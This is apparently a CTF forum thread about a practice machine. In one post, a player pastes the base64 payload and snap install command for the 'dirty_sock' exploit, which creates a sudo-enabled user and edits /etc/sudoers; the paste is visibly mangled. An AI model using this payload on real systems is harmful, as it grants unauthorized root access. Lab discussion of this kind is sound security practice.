I managed to find the password and a hash of somesort. Can someone ping me as to how to crack it? I know of some tools but need some help. Thanks
Type your comment> @dani8388 said:
Hello everyone, I am trying to get the system flag but it is impossible, I can’t create the user dirty_sock , I have used these 2 instructions:
python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD xICAAAAAAAAsAIAAAAAAAA ////////// + AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA + PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J / e5 + + lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET qumvhFkbY5Pr4ba1mk4 / XVLOZmGVXmojv / IHq2fZcc / VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA / Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGm IBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc + MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw “+” A “* 4256 +” == " '| base64 -d> exploit.snap
and then:
sudo / usr / bin / snap install --devmode exploit.snap
Then I check / etc / passwd but there is no dirty_sock user …
Could someone help me please?
@administrator please?
Can someone help me please?
Thanks in advance
Type your comment> @x00future said:
Could someone DM me a nudge? have basic shell with a****. found default m**** creds but they are not working. Want to run what I am doing past someone who has rooted to see if i am on correct track or not.
same issue here
Stuck in shell as a*****, found some m**** creds and db, however unable to connect from shell to dig further. I know what I want to do after, but just not able to connect to the service I want. Do I need to try harder or am I missing something?
First box here. Sorry if I’m not cryptic enough and this would be a spoiler, if so please report and take my comment off air :).
Every time I run a code to try and work towards root it tells me that there is a syntax error. Not sure what the problem is when I copied it correctly. Anyone able to help me out?
Type your comment> @CyberB0y said:
Every time I run a code to try and work towards root it tells me that there is a syntax error. Not sure what the problem is when I copied it correctly. Anyone able to help me out?
depressed. I’m pretty sure I have the same problem as you…
> @ryan0n said: > Got user, working on root. Root seems fairly straight forward, will just require research and prep in a piece of software I haven’t ever had to learn about. > > If you are staging/debugging your s***, and are in a kali/etc vm, you’ll need to enable nested kvm features for your vm. For instance in Virtualbox, you’ll go to the VM’s settings -> System -> Processor -> and tick the box for “enable nested vt-x/amd-v”. > > EDIT: rooted I don’t have any boxes in my processor settings. Supposedly windows 10 doesn’t allow nested virtualization? Anyone solve this one without s***? https://communities.vmware.com/t5/VMware-Workstation-Pro/Nested-virtualization-on-Workstation-14-PRO-on-AMD-Ryzen/m-p/475023#M24618